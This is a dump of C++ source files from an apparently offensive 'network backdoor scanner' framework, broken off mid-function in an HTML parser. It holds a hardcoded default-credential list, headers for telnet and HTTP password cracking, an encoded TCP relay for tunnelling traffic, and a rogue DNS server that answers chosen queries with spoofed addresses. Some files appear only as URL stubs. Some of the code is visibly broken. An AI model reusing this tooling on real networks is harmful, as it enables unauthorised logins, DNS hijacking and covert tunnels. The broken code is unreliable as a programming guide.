/scanner_framework/local_network.cpp:
--------------------------------------------------------------------------------

#include

#include
#include

#include "local_network.h"
#include "scan_arp.h"
#include "scan_tcp.h"
#include "scan_icmp.h"

#pragma comment (lib,"ws2_32")


#define MAX_ADAPTER_NAME_LENGTH 256
#define MAX_ADAPTER_DESCRIPTION_LENGTH 128
#define MAX_ADAPTER_ADDRESS_LENGTH 8

typedef struct {
    char String[4 * 4];
} IP_ADDRESS_STRING, *PIP_ADDRESS_STRING, IP_MASK_STRING, *PIP_MASK_STRING;

typedef struct _IP_ADDR_STRING {
    struct _IP_ADDR_STRING* Next;
    IP_ADDRESS_STRING IpAddress;
    IP_MASK_STRING IpMask;
    DWORD Context;
} IP_ADDR_STRING, *PIP_ADDR_STRING;

typedef struct _IP_ADAPTER_INFO {
    struct _IP_ADAPTER_INFO *Next;
    DWORD ComboIndex;
    char AdapterName[MAX_ADAPTER_NAME_LENGTH + 4];
    char Description[MAX_ADAPTER_DESCRIPTION_LENGTH + 4];
    UINT AddressLength;
    BYTE Address[MAX_ADAPTER_ADDRESS_LENGTH];
    DWORD Index;
    UINT Type;
    UINT DhcpEnabled;
    PIP_ADDR_STRING CurrentIpAddress;
    IP_ADDR_STRING IpAddressList;
    IP_ADDR_STRING GatewayList;
    IP_ADDR_STRING DhcpServer;
    BOOL HaveWins;
    IP_ADDR_STRING PrimaryWinsServer;
    IP_ADDR_STRING SecondaryWinsServer;
    time_t LeaseObtained;
    time_t LeaseExpires;
} IP_ADAPTER_INFO, *PIP_ADAPTER_INFO;

typedef DWORD (__stdcall *_GetAdaptersInfo)(PIP_ADAPTER_INFO,PULONG);

char local_host_name[HOST_NAME_LENGTH]={0};
char local_ip[IPV4_IP_LENGTH]={0};
unsigned char local_mac[ETH_ADDRESS_LENGTH]={0};
char gateway_ip[IPV4_IP_LENGTH]={0};
unsigned char gateway_mac[ETH_ADDRESS_LENGTH]={0};
char dhcp_server[IPV4_IP_LENGTH]={0};
char network_mask[IPV4_IP_LENGTH]={0};
char network_session[IPV4_IP_LENGTH]={0};
char network_session_last[IPV4_IP_LENGTH]={0};
unsigned long network_session_size=0;

static void get_ip(void) {
    gethostname(local_host_name,64);
    hostent* host=gethostbyname(local_host_name);
    char* ip=inet_ntoa(*(in_addr*)host->h_addr_list[0]);
    memcpy(local_ip,ip,strlen(ip));
}

static void get_local_network_information(void) {
    HMODULE dll_iphlpapi=NULL;
    dll_iphlpapi=LoadLibrary("iphlpapi.dll");
    _GetAdaptersInfo GetAdaptersInfo_=(_GetAdaptersInfo)GetProcAddress(dll_iphlpapi,"GetAdaptersInfo");

    IP_ADAPTER_INFO local_network_data;
    unsigned long output_local_network_data_length=sizeof(local_network_data);
    DWORD return_code=GetAdaptersInfo_(&local_network_data,&output_local_network_data_length);

    if (ERROR_BUFFER_OVERFLOW==return_code) {
        return_code=GetAdaptersInfo_(&local_network_data,&output_local_network_data_length);
    }
    if (NO_ERROR==return_code) {
        memcpy(local_mac,&local_network_data.Address,ETH_ADDRESS_LENGTH);

        if (local_network_data.DhcpEnabled)
            memcpy(dhcp_server,&local_network_data.DhcpServer.IpAddress.String,IPV4_IP_LENGTH-1);
        memcpy(network_mask,&local_network_data.IpAddressList.IpMask.String,IPV4_IP_LENGTH-1);
        memcpy(gateway_ip,&local_network_data.GatewayList.IpAddress.String,IPV4_IP_LENGTH-1);

        unsigned long network_mask_=inet_addr(network_mask),local_ip_=inet_addr(local_ip);
        unsigned long network_session_=local_ip_&network_mask_;
        in_addr network_session___;
        network_session___.S_un.S_addr=network_session_;
        char* network_session__=inet_ntoa(network_session___);
        memcpy(network_session,network_session__,IPV4_IP_LENGTH-1);

        network_session_size=~htonl(network_mask_);

        network_session_=htonl(network_session_);
        network_session_+=network_session_size;
        network_session_=htonl(network_session_);
        network_session___.S_un.S_addr=network_session_;
        char* network_session_last_=inet_ntoa(network_session___);
        memcpy(network_session_last,network_session_last_,IPV4_IP_LENGTH-1);

        scan_arp(gateway_ip,(char*)gateway_mac);
    }
}

bool check_ip(const char* ip) {
    if (-1==inet_addr(ip))
        return false;
    return true;
}

void local_network_init(void) {
    WSADATA init;
    WSAStartup(2,&init);
    scan_arp_init();
    scan_tcp_init();
    scan_icmp_init();
    get_ip();
    get_local_network_information();
}

void local_network_clean(void) {
    scan_icmp_clean();
    scan_tcp_clean();
    scan_arp_clean();
    WSACleanup();
}

void sleep(unsigned int time) {
    Sleep(time);
}

bool get_host(const char* input_host,char* output_ip) {
    hostent* host=gethostbyname(input_host);
    if (NULL!=host) {
        char* copy_ip=inet_ntoa(*(in_addr*)host->h_addr_list[0]);
        memcpy(output_ip,copy_ip,IPV4_IP_LENGTH);
        return true;
    }
    return false;
}

--------------------------------------------------------------------------------
/scanner_framework/local_network.h:
--------------------------------------------------------------------------------

#ifndef _LOCAL_NETWORK_H__
#define _LOCAL_NETWORK_H__

#define ETH_ADDRESS_LENGTH 6

#define IPV4_IP_LENGTH 0x10

#define HOST_NAME_LENGTH 64

extern char local_host_name[HOST_NAME_LENGTH];
extern char local_ip[IPV4_IP_LENGTH];
extern unsigned char local_mac[ETH_ADDRESS_LENGTH];
extern char gateway_ip[IPV4_IP_LENGTH];
extern unsigned char gateway_mac[ETH_ADDRESS_LENGTH];
extern char dhcp_server[IPV4_IP_LENGTH];
extern char network_mask[IPV4_IP_LENGTH];
extern char network_session[IPV4_IP_LENGTH];
extern char network_session_last[IPV4_IP_LENGTH];
extern unsigned long network_session_size;

bool check_ip(const char* ip);
void local_network_init(void);
void local_network_clean(void);
void sleep(unsigned int time);
bool get_host(const char* input_host,char* output_ip);

#endif

--------------------------------------------------------------------------------
/scanner_framework/local_thread.cpp:
--------------------------------------------------------------------------------

#include <windows.h>

#include "local_thread.h"

unsigned long create_thread(void* function_address,void* function_parameter_list) {
    HANDLE thread_handle=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)function_address,(LPVOID)function_parameter_list,NULL,NULL);
    // CreateThread reports failure with NULL, not INVALID_HANDLE_VALUE
    if (NULL!=thread_handle)
        return (unsigned long)thread_handle;
    return -1;
}

void wait_thread(unsigned long thread_handle) {
    WaitForSingleObject((HANDLE)thread_handle,INFINITE);
}

void close_thread(unsigned long thread_handle) {
    // cast back to HANDLE, as wait_thread does
    CloseHandle((HANDLE)thread_handle);
}

--------------------------------------------------------------------------------
/scanner_framework/local_thread.h:
--------------------------------------------------------------------------------

#ifndef _LOCAL_THREAD_H__
#define _LOCAL_THREAD_H__

unsigned long create_thread(void* function_address,void* function_parameter_list);
void wait_thread(unsigned long thread_handle);
void close_thread(unsigned long thread_handle);

#endif

--------------------------------------------------------------------------------
/scanner_framework/main.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/main.cpp
--------------------------------------------------------------------------------
/scanner_framework/network_crack.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/network_crack.cpp
--------------------------------------------------------------------------------
/scanner_framework/network_crack.h:
--------------------------------------------------------------------------------

#ifndef _NETWORK_CRACK_H__
#define _NETWORK_CRACK_H__

#include "resolver_dictionary.h"
#include "resolver_http.h"

#ifndef _STRING_

#include <string>

using std::string;
using std::pair;

#endif

#ifndef _VECTOR_

#include <vector>

using std::vector;

#endif

#define NETWORK_CRACK_TIMEOUT 5000
#define NETWORK_CRACK_RECV_BUFFER_LENGTH 1024*10


typedef vector crack_packet_raw;
typedef vector crack_packet_http;
typedef pair crack_index;

crack_packet_raw network_crack_init(const string crack_packet,...);
crack_packet_http network_crack_init(const http_packet& crack_packet,...);

crack_index network_crack_online(const string target_ip,const unsigned int target_port,const crack_packet_raw& crack_packet,const string crack_term,bool first_recv);
crack_index network_crack_online(const string target_ip,const unsigned int target_port,const crack_packet_http& crack_packet,const string crack_term,bool first_recv);

crack_index network_crack_telnet(const string target_ip,const unsigned int target_port,const dictionary& crack_dictionary);
crack_index network_crack_http(const string target_ip,const unsigned int target_port,dictionary crack_dictionary,const string crack_express,const string crack_term);


#endif

--------------------------------------------------------------------------------
/scanner_framework/network_dictionary.h:
--------------------------------------------------------------------------------

#ifndef _NETWORD_DICTIONARY_H__
#define _NETWORD_DICTIONARY_H__

const char* username[]={
    "admin",
    "root",
    "administrator",
    "guest"
};

const char* password[]={
    "",
    "0123456789",
    "admin",
    "root",
    "toor",
    "access",
    "debug",
    "Manager",
    "User",
    "guest",
    "cicso",
    "sa",
    "super",
    "install",
    "123456",
    "1q2w3e4r",
    "fuckyou",
    "wocaoni",
    "Password",
    "password"
};

#endif

--------------------------------------------------------------------------------
/scanner_framework/network_encoder.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/network_encoder.cpp
--------------------------------------------------------------------------------
/scanner_framework/network_encoder.h:
--------------------------------------------------------------------------------

#ifndef _NETWORK_ENCODER_H__
#define _NETWORK_ENCODER_H__

unsigned int network_encode(char* encode_string,unsigned int encode_string_length_) ;
void network_decode(char* decode_string,unsigned int decode_string_length);

#endif

--------------------------------------------------------------------------------
/scanner_framework/network_route.cpp:
--------------------------------------------------------------------------------

#pragma warning (disable:4786)

#include

#include
#include

#include

#include "network_encoder.h"
#include "network_route.h"
#include "scan_tcp.h"


using std::string;
using std::pair;
using std::vector;


typedef pair pair_thread;
typedef pair pair_handle;
typedef pair port;
typedef vector port_list;


port_list route_list;


static void network_route_thread_tunnal(pair_handle* pair_socket) {
    char recv_buffer[PACKET_RECV_BUFFER]={0};

    while (true) {
        unsigned int recv_length=scan_tcp_recv(pair_socket->first,recv_buffer,PACKET_RECV_BUFFER);

        if (-1==recv_length || !recv_length)
            break;

        network_decode(recv_buffer,recv_length);
        scan_tcp_send(pair_socket->second,recv_buffer,recv_length);
        memset(recv_buffer,0,recv_length);
    }

    // delete pair_socket;
}

static void network_route_thread_local(pair_handle* pair_socket) {
    char recv_buffer[PACKET_RECV_BUFFER]={0};

    while (true) {
        unsigned int recv_length=scan_tcp_recv(pair_socket->first,recv_buffer,PACKET_RECV_BUFFER);

        if (-1==recv_length || !recv_length)
            break;

        recv_length=network_encode(recv_buffer,recv_length);
        scan_tcp_send(pair_socket->second,recv_buffer,recv_length);
        memset(recv_buffer,0,recv_length);
    }

    // delete pair_socket;
}

bool network_route(const char* remote_ip,unsigned int remote_port,const char* reverse_ip,unsigned int reverse_port) {
    unsigned int remote_handle=scan_tcp_connect(remote_ip,remote_port);
    unsigned int reverse_handle=scan_tcp_connect(reverse_ip,reverse_port);

    if (-1!=remote_handle && -1!=reverse_handle) {
        HANDLE remote_thread=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_local,new pair_handle(remote_handle,reverse_handle),NULL,NULL);
        HANDLE reverse_thread=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_tunnal,new pair_handle(reverse_handle,remote_handle),NULL,NULL);

        if (INVALID_HANDLE_VALUE!=remote_thread && INVALID_HANDLE_VALUE!=reverse_thread) {
            // no static but you can custom it ! ..
            return true;
        }
    }
    scan_tcp_disconnect(remote_handle);
    scan_tcp_disconnect(reverse_handle);
    return false;
}

--------------------------------------------------------------------------------
/scanner_framework/network_route.h:
--------------------------------------------------------------------------------

#ifndef _NETWORK_ROUTE_H__
#define _NETWORK_ROUTE_H__

bool network_route(const char* remote_ip,unsigned int remote_port,const char* reverse_ip,unsigned int reverse_port);

#endif

--------------------------------------------------------------------------------
/scanner_framework/network_server_dns.cpp:
--------------------------------------------------------------------------------

#include
#include
#include
#include

#include
#include

#include
#include

#include "local_network.h"
#include "network_server_dns.h"

using std::string;
using std::vector;

#define DNS_PORT 53
#define DNS_QUERY_TYPE 0x1
#define DNS_SEND_BUFFER 1024
#define DNS_RECV_BUFFER 1024

#pragma comment (lib,"ws2_32")

#pragma pack(1)

typedef struct {
    unsigned short id;
    unsigned short flags;
    unsigned short quests;
    unsigned short answers;
    unsigned short author;
    unsigned short addition;
} dns,*point_dns;

typedef struct {
    unsigned char *name;
    unsigned short type;
    unsigned short classes;
} query,*point_query;

typedef struct {
    unsigned short name;
    unsigned short type;
    unsigned short classes;
    unsigned long ttl;
    unsigned short length;
    unsigned long addr;
} response,*point_response;

#pragma pack(4)

typedef struct {
    string host;
    string ip;
} dns_host_entry;
typedef vector dns_host_entry_list;

SOCKET dns_sock=SOCKET_ERROR;
HANDLE dns_thread_handle=INVALID_HANDLE_VALUE;
CRITICAL_SECTION dns_thread_signal={0};
dns_host_entry_list dns_host_list;
bool loop_flag=true;

static char* conver_host(char* input_host) {
    if (NULL==input_host) return NULL;

    char* output_string=NULL;
    char* host=input_host;
    unsigned short alloc_length=0;
    while ('\0'!=*host) {
        alloc_length+=*(unsigned char*)host+1;
        host=(char*)(input_host+alloc_length);
    }
    output_string=(char*)malloc(alloc_length);
    memset(output_string,0,alloc_length);
    unsigned short read_point=0;
    while ('\0'!=*input_host) {
        unsigned char read_length=*input_host++;
        memcpy((char*)(output_string+read_point),input_host,read_length);
        *(char*)(output_string+read_point+read_length)='.';
        read_point+=read_length+1;
        input_host+=read_length;
    }
    *(char*)(output_string+read_point-1)='\0';

    return output_string;
}

static void network_server_dns_thread(void) {
    while (loop_flag) {
        char recv_buffer[DNS_RECV_BUFFER]={0};
        sockaddr_in remote;
        int remote_length=sizeof(remote);
        int recv_length=recvfrom(dns_sock,recv_buffer,DNS_RECV_BUFFER,0,(sockaddr*)&remote,&remote_length);
        if (SOCKET_ERROR!=recv_length) {
            point_dns dns_=(point_dns)recv_buffer;
            point_query query_=(point_query)&recv_buffer[sizeof(dns)];
            unsigned short query_type=ntohs(*(unsigned short*)((unsigned long)query_+strlen((const char*)query_)+1));
            if (DNS_QUERY_TYPE==query_type) {
                bool hijack_flag=false;
                char* query_host=conver_host((char*)query_);
                unsigned int query_total=ntohs(dns_->quests);

                string host_ip;
                EnterCriticalSection(&dns_thread_signal);
                for (dns_host_entry_list::iterator entry_list_iterator=dns_host_list.begin();
                     entry_list_iterator!=dns_host_list.end();
                     ++entry_list_iterator) {
                    string query_host_(query_host);
                    if (entry_list_iterator->host==query_host_) {
                        host_ip=entry_list_iterator->ip;
                        hijack_flag=true;
                        break;
                    }
                }
                LeaveCriticalSection(&dns_thread_signal);
                free(query_host);

                if (hijack_flag) {
                    char send_buffer[DNS_SEND_BUFFER]={0};
                    response response;
                    if (host_ip.empty())
                        response.addr=inet_addr(local_ip);
                    else
                        response.addr=inet_addr(host_ip.c_str());
                    response.length=htons(4);
                    response.classes=htons(1);
                    response.ttl=htonl(300);
                    response.type=htons(query_type);
                    response.name=htons(0xC00C);
                    dns_->flags=htons(0x8180);
                    dns_->answers=htons(1);
                    memcpy(send_buffer,recv_buffer,recv_length);
                    memcpy(&send_buffer[recv_length],&response,sizeof(response));
                    sendto(dns_sock,send_buffer,recv_length+sizeof(response),0,(const sockaddr*)&remote,sizeof(remote));
                }
            }
        } else
            break;
    }
}

bool network_server_dns_start(void) {
    SOCKET sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);

    sockaddr_in local;
    local.sin_addr.S_un.S_addr=0;
    local.sin_family=AF_INET;
    local.sin_port=htons(DNS_PORT);
    if (SOCKET_ERROR==bind(sock,(const sockaddr*)&local,sizeof(sockaddr_in)))
        return false;

    dns_thread_handle=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_server_dns_thread,NULL,NULL,NULL);
    if (INVALID_HANDLE_VALUE==dns_thread_handle) {
        closesocket(sock);
        return false;
    }
    InitializeCriticalSection(&dns_thread_signal);
    dns_sock=sock;
    return true;
}

void network_server_dns_add(const char* host,const char* ip) {
    EnterCriticalSection(&dns_thread_signal);
    for (dns_host_entry_list::iterator entry_list_iterator=dns_host_list.begin();
         entry_list_iterator!=dns_host_list.end();
         ++entry_list_iterator) {
        if (entry_list_iterator->host==host) {
            entry_list_iterator->ip=ip;
            goto EXIT;
        }
    }{
    dns_host_entry new_entry;
    new_entry.host=host;
    new_entry.ip=ip;
    dns_host_list.push_back(new_entry);}
EXIT:
    LeaveCriticalSection(&dns_thread_signal);
}

void network_server_dns_delete(const char* host) {
    EnterCriticalSection(&dns_thread_signal);
    for (dns_host_entry_list::iterator entry_list_iterator=dns_host_list.begin();
         entry_list_iterator!=dns_host_list.end();
         ++entry_list_iterator) {
        if (entry_list_iterator->host==host) {
            dns_host_list.erase(entry_list_iterator);
            goto EXIT;
        }
    }
EXIT:
    LeaveCriticalSection(&dns_thread_signal);
}

void network_server_dns_close(void) {
    DeleteCriticalSection(&dns_thread_signal);
    CloseHandle(dns_thread_handle);
    dns_thread_handle=INVALID_HANDLE_VALUE;
    closesocket(dns_sock);
    dns_sock=SOCKET_ERROR;
}

--------------------------------------------------------------------------------
/scanner_framework/network_server_dns.h:
--------------------------------------------------------------------------------

#ifndef _NETWORK_SERVER_DNS_
#define _NETWORK_SERVER_DNS_

bool network_server_dns_start(void);
void network_server_dns_add(const char* host,const char* ip);
void network_server_dns_delete(const char* host);
void network_server_dns_close(void);

#endif

--------------------------------------------------------------------------------
/scanner_framework/resolver_dictionary.cpp:
--------------------------------------------------------------------------------

#pragma warning (disable:4503)
#pragma warning (disable:4786)

#include
#include
#include

#include "resolver_dictionary.h"
#include "resolver_string.h"


dictionary resolve_dictionary_open(const string dictionary_path) {
    dictionary result;
    FILE* file_handle=fopen(dictionary_path.c_str(),"r");

    if (NULL!=file_handle) {
        fseek(file_handle,0,SEEK_END);
        unsigned long file_length=ftell(file_handle);

        if (!file_length) {
            char* file_buffer=(char*)malloc(file_length);

            if (NULL!=file_buffer) {
                fseek(file_handle,0,SEEK_SET);
                memset(file_buffer,0,file_length);
                fread(file_buffer,1,file_length,file_handle);
                string resolve_string(file_buffer);

                try {
                    unsigned long resolve_point=find_string(resolve_string,"\r\n");
                    split_result split;
                    while (!resolve_point) {
                        split=split_string(resolve_string,resolve_point);
                        string line(split.first);
                        split_result split_line(split_string(line,find_string(line," ")));
                        left_move_string(split_line.second,1);
                        string username(split_line.first),password(split_line.second);
                        left_remove_space(username);
                        right_remove_space(username);
                        left_remove_space(password);
                        right_remove_space(password);
                        result[username].push_back(password);
                        resolve_string=split.second;
                        left_move_string(resolve_string,2);
                        resolve_point=find_string(resolve_string,"\r\n");
                    }
                } catch (...) {
                }
                free(file_buffer);
            }
        }
        fclose(file_handle);
    }
    return result;
}

dictionary resolve_dictionary_open(const string username_path,const string password_path) {
    dictionary result;
    password_list password_list_;
    FILE* file_username=fopen(username_path.c_str(),"r");
    FILE* file_password=fopen(password_path.c_str(),"r");

    if (NULL!=file_username && NULL!=file_password) {
        fseek(file_username,0,SEEK_END);
        fseek(file_password,0,SEEK_END);
        unsigned long file_username_length=ftell(file_username);
        unsigned long file_password_length=ftell(file_password);

        if (!file_username_length && !file_password_length) {
            char* file_username_buffer=(char*)malloc(file_username_length);
            char* file_password_buffer=(char*)malloc(file_password_length);

            if (NULL!=file_username_buffer && NULL!=file_password_buffer) {
                fseek(file_username,0,SEEK_SET);
                memset(file_username_buffer,0,file_username_length);
                fread(file_username_buffer,1,file_username_length,file_username);
                fseek(file_password,0,SEEK_SET);
                memset(file_password_buffer,0,file_password_length);
                fread(file_password_buffer,1,file_password_length,file_username);

                string resolve_username(file_username_buffer);
                string resolve_password(file_password_buffer);

                try {
                    unsigned long resolve_point=find_string(resolve_password,"\r\n");
                    split_result split;

                    while (!resolve_point) {
                        split=split_string(resolve_password,resolve_point);
                        left_remove_space(split.first);
                        right_remove_space(split.first);
                        password_list_.push_back(split.first);
                        resolve_password=split.second;
                        left_move_string(resolve_password,2);
                        resolve_point=find_string(resolve_password,"\r\n");
                    }
                } catch(...) {
                }

                try {
                    unsigned long resolve_point=find_string(resolve_password,"\r\n");
                    split_result split;
                    while (!resolve_point) {
                        split=split_string(resolve_username,resolve_point);
                        result.insert(pair(split.first,password_list_));
                        resolve_username=split.second;
                        left_move_string(resolve_username,2);
                        resolve_point=find_string(resolve_username,"\r\n");
                    }
                } catch(...) {
                }
                free(file_username_buffer);
                free(file_password_buffer);
            }
        }
        fclose(file_username);
        fclose(file_password);
    }
    return result;
}

bool resolve_dictionary_is_empty(const dictionary& in_dictionary) {
    return in_dictionary.empty();
}

unsigned int resolve_dictionary_get_user_count(const dictionary& in_dictionary) {
    return in_dictionary.size();
}

username_list resolve_dictionary_get_user_list(const dictionary& in_dictionary) {
    username_list result;

    for (dictionary::const_iterator iterator=in_dictionary.begin();
         iterator!=in_dictionary.end();
         ++iterator)
        result.push_back(iterator->first);

    return result;
}

unsigned int resolve_dictionary_get_password_count(const dictionary& in_dictionary) {
    if (!resolve_dictionary_is_empty(in_dictionary))
        return in_dictionary.begin()->second.size();
    return 0;
}

password_list resolve_dictionary_get_password_list(const dictionary& in_dictionary,const string username) {
    password_list result;
    for (dictionary::const_iterator iterator=in_dictionary.begin();
         iterator!=in_dictionary.end();
         ++iterator) {
        if (username==iterator->first) {
            result=iterator->second;
            break;
        }
    }

    return result;
}

void resolve_dictionary_add_username(dictionary& in_dictionary,const string username) {
    if (!in_dictionary.empty()) {
        in_dictionary[username]=in_dictionary.begin()->second;
    } else {
        password_list empty_list;
        in_dictionary[username]=empty_list;
    }
}

void resolve_dictionary_add_password(dictionary& in_dictionary,const string password) {
    if (!in_dictionary.empty()) {
        for (dictionary::iterator iterator=in_dictionary.begin();
             iterator!=in_dictionary.end();
             ++iterator) {
            iterator->second.push_back(password);
        }
    }
}

void resolve_dictionary_add_password(dictionary& in_dictionary,const password_list password) {
    if (!in_dictionary.empty()) {
        for (dictionary::iterator username_iterator=in_dictionary.begin();
             username_iterator!=in_dictionary.end();
             ++username_iterator) {
            for (password_list::const_iterator password_iterator=password.begin();
                 password_iterator!=password.end();
                 ++password_iterator) {
                username_iterator->second.push_back(*password_iterator);
            }
        }
    }
}

--------------------------------------------------------------------------------
/scanner_framework/resolver_dictionary.h:
--------------------------------------------------------------------------------


#ifndef _RESOVLVER_DICTIONARY_H__
#define _RESOVLVER_DICTIONARY_H__


#ifndef _STRING_

#include <string>

using std::string;
using std::pair;

#endif

#ifndef _MAP_

#include <map>

using std::map;

#endif

#ifndef _VECTOR_

#include <vector>

using std::vector;

#endif


typedef vector username_list;
typedef vector password_list;
typedef map dictionary;


dictionary resolve_dictionary_open(const string dictionary_path);
dictionary resolve_dictionary_open(const string username_path,const string password_path);

bool resolve_dictionary_is_empty(const dictionary& in_dictionary);
unsigned int resolve_dictionary_get_user_count(const dictionary& in_dictionary);
username_list resolve_dictionary_get_user_list(const dictionary& in_dictionary);
unsigned int resolve_dictionary_get_password_count(const dictionary& in_dictionary);
password_list resolve_dictionary_get_password_list(const dictionary& in_dictionary,const string username);
void resolve_dictionary_add_username(dictionary& in_dictionary,const string username);
void resolve_dictionary_add_password(dictionary& in_dictionary,const string password);
void resolve_dictionary_add_password(dictionary& in_dictionary,const password_list password);

#endif

--------------------------------------------------------------------------------
/scanner_framework/resolver_express.cpp:
--------------------------------------------------------------------------------

#pragma warning (disable:4786)

#include

#include

#include "encoder_base64.h"
#include "resolver_express.h"
#include "resolver_string.h"


typedef vector arg_list;


string resolve_express_http(const string express) {
    string result;
    split_result split(split_string(express,find_string(express,";")));

    if (split.second.empty())
        return split.first;

    string format_string(split.first);
    left_move_string(split.second,1);
    string arg_string(split.second);
    split=split_string(split.second,find_string(split.second,","));
    arg_list list;

    while (!split.second.empty()) {
        list.push_back(split.first);
        left_move_string(split.second,1);
        split=split_string(split.second,find_string(split.second,","));
    }
    list.push_back(split.first);

    string element;
    string element_name,element_value;
    unsigned int arg_index=0;
    split=split_string(format_string,find_string(format_string,","));

    while (!split.second.empty()) {
        element=split.first;
        split_result element_split(split_string(element,find_string(element,":")));
        left_move_string(element_split.second,1);
        element_name=element_split.first;
        element_value=element_split.second;

        if (-1!=find_string(element_value,"%")) {
            left_move_string(element_value,find_string(element_value,"%")+1);// TIPS : There is no Get Type ..
            // But I don't want to use it ..
            element_value=list[arg_index];
            ++arg_index;
        }
        result+=element_name;
        result+=":";
        result+=element_value;
        result+="\r\n";
        left_move_string(split.second,1);
        split=split_string(split.second,find_string(split.second,","));
    }
    split_result element_split(split_string(split.first,find_string(split.first,":")));
    left_move_string(element_split.second,1);
    element_name=element_split.first;
    element_value=element_split.second;

    if (-1!=find_string(element_value,"%")) {
        left_move_string(element_value,find_string(element_value,"%")+1);// TIPS : There is no Get Type ..
        // But I don't want to use it ..
        element_value=list[arg_index];
        ++arg_index;
    }
    result+=element_name;
    result+=":";
    result+=element_value;
    result+="\r\n\r\n";

    return result;
}

static long ramdon(long down,long up) {
    srand(GetTickCount());
    return down+(rand()*(up-down)/32768);
}

/*

    function(123123)|function(321312)
    function(function(313213123))

    function:rnd arg:[down-up]
    rnd([1-100])

*/

static const string function_rnd("rnd");
static const string function_time("time");
static const string function_len("len");
static const string function_base64("base64");

static bool resolve_express_is_function_name(const string function_name) {
    if (!function_name.empty())
        if (-1==find_string(function_name,"(") &&
            -1==find_string(function_name,")") &&
            -1==find_string(function_name,"-") &&
            -1==find_string(function_name,"|") &&
            -1==string_to_number(function_name))
            return true;
    return false;
}

static bool resolve_express_is_function(const string express) {
    split_result split(split_string(express,"("));
    string function_name(split.first),function_arg(separate_string(express,"(",")"));

    if (resolve_express_is_function_name(function_name) && !function_arg.empty())
        return true;
    return false;
}

string resolve_express_function(const string express) {
    if (!resolve_express_is_function(express)) return "";

    split_result split(split_string(express,"|"));
    string function(split.first),next_function(split.second);
    left_move_string(next_function,1);
    string result;

    while (!function.empty()) {
        if (!resolve_express_is_function(function)) return function;

        split=split_string(function,"(");
        string function_name(upper_string(split.first)),function_arg(separate_string(function,"(",")"));

        if (function_rnd==function_name) {
            function_arg=separate_string(function_arg,"[","]");
            string down,up;
            split=split_string(function_arg,"-");
            if (1

using std::string;

#endif


/*

    element_name_1:element_value_1,element_name_2:element_value_2,element_name_3:%string%,element_name_4:%value%;string,value

*/

string resolve_express_http(const string express);

/*

    function(123123)|function(321312)
    function(function(313213123))

    function:rnd arg:[down-up]
    rnd([1-100])

*/

string resolve_express_function(const string express);
string resolve_express(const string express);


#endif

--------------------------------------------------------------------------------
/scanner_framework/resolver_html.cpp:
--------------------------------------------------------------------------------

#pragma warning (disable:4786)

#include "resolver_html.h"
#include "resolver_string.h"


#define HTML_TAG_NAME "HTML_TAG_NAME"
#define HTML_TAG_SUBTAG "HTML_TAG_SUBTAG"


bool resolve_html_is_empty(const tag& in_tag) {
    if (in_tag.first.empty())
        return true;
    return false;
}

string resolve_html_get_tag_name(const tag& in_tag) {
    tag_data::const_iterator find_iterator=in_tag.first.find(HTML_TAG_NAME);

    if (find_iterator!=in_tag.first.end())
        return find_iterator->second;
    return "";
}

void resolve_html_set_tag_name(tag& in_tag,const string tag_name) {
    in_tag.first[HTML_TAG_NAME]=tag_name;
}

string resolve_html_get_tag_subtag(const tag& in_tag) {
    tag_data::const_iterator find_iterator=in_tag.first.find(HTML_TAG_SUBTAG);

    if (find_iterator!=in_tag.first.end())
        return find_iterator->second;
    return "";
}

void resolve_html_set_tag_subtag(tag& in_tag,const string tag_subtag) {
    in_tag.first[HTML_TAG_SUBTAG]=tag_subtag;
}

unsigned int resolve_html_get_tag_element_count(const tag& in_tag) {
    return in_tag.second.size();
}

tag_element_list resolve_html_get_tag_element_list(const tag& in_tag) {
    tag_element_list list;

    for (tag_element::const_iterator iterator=in_tag.second.begin();
         iterator!=in_tag.second.end();
         ++iterator)
        list.push_back(iterator->first);
    return list;
}

string resolve_html_get_tag_element(const tag& in_tag,const string element_name) {
    tag_element::const_iterator find_iterator=in_tag.second.find(element_name);

    if (find_iterator!=in_tag.second.end())
        return find_iterator->second;
    return "";
}

void resolve_html_set_tag_element(tag& in_tag,const string element_name,const string element_value) {
    in_tag.second[element_name]=element_value;
}

void resolve_html_delete_tag_element(tag& in_tag,const string element_name) {
    tag_element::const_iterator find_iterator=in_tag.second.find(element_name);

    if (find_iterator!=in_tag.second.end())
        in_tag.second.erase(element_name);
}

tag resolve_html_to_tag(const string in_string) {
    tag result;
    string resolve_string(in_string);
    unsigned int left_flag_front=find_string(in_string,"<");
    unsigned int right_flag_front=find_string(in_string,">");

    if (-1!=left_flag_front && -1!=right_flag_front) {
        unsigned int left_flag_back=in_string.find_last_of("");

        if (-1!=left_flag_back && -1!=right_flag_back) {
            string first_tag,last_tag;
            split_result split(split_string(in_string,right_flag_front));
            first_tag=split.first;
            left_move_string(first_tag,left_flag_front+1);
            split=split_string(in_string,left_flag_back+1);
            last_tag=split.second;
            split=split_string(last_tag,last_tag.find_last_of(">"));
            last_tag=split.first;
            if (-1!=find_string(first_tag," ")) {
                split=split_string(first_tag,find_string(first_tag," "));
                first_tag=split.first;
            }

            if (first_tag==last_tag) {
                resolve_html_set_tag_name(result,first_tag);

                string resolve_string(separate_string(in_string,left_flag_front+1,right_flag_front-1));
                left_move_string(resolve_string,first_tag.length());
                left_remove_space(resolve_string);
                right_remove_space(resolve_string);

                if (!resolve_string.empty()) {
                    unsigned int space_offset=find_string(resolve_string," ");

                    while (-1!=space_offset) {
                        split=split_string(resolve_string,space_offset);
                        resolve_string=split.second;
                        left_move_string(resolve_string,1);
                        string element(split.first);
                        split=split_string(element,find_string(element,"="));
                        string element_name(split.first),element_value(split.second);
                        right_remove_space(element_name);
                        left_move_string(element_value,1);
                        left_remove_space(element_value);
                        left_remove(element_value,"\"");
                        right_remove(element_value,"\"");
                        resolve_html_set_tag_element(result,element_name,element_value);
